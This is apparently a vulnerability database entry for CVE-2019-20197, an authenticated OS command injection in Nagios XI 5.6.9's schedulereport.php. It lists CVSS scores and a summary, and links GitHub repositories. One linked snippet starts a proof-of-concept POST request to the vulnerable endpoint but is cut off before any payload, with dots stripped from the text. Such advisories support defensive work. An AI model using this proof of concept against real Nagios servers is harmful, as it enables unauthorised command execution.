9
CVSSv2

CVE-2019-20197

Published: 31/12/2019 Updated: 07/01/2020
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 802
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

In Nagios XI 5.6.9, an authenticated user is able to execute arbitrary OS commands via shell metacharacters in the id parameter to schedulereport.php, in the context of the web-server user account.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

nagios nagios xi 5.6.9

Github Repositories

Nagios XI远程命令执行漏洞 <v5.6.9

CVE-2019-20197 Nagios XI远程命令执行漏洞 &lt;= v569 Payload 101020100:81/nagio

CVE-2019-20197

Nagios XI远程命令执行漏洞(CVE-2019-20197) POC: POST /nagiosxi/includes/components/scheduledreporting/schedulereportphp HTTP/11 Host: xxxx User-Agent: Mozilla/50 (Windows NT 100; WOW64; rv:490) Gecko/20100101 Firefox/490 Accept: text/html,application/xhtml+xml,application/xml;q=09,/;q=08 Accept-Language: zh-CN,zh;q=08,en-US;q=05,en;q=03 Accept-Encoding: g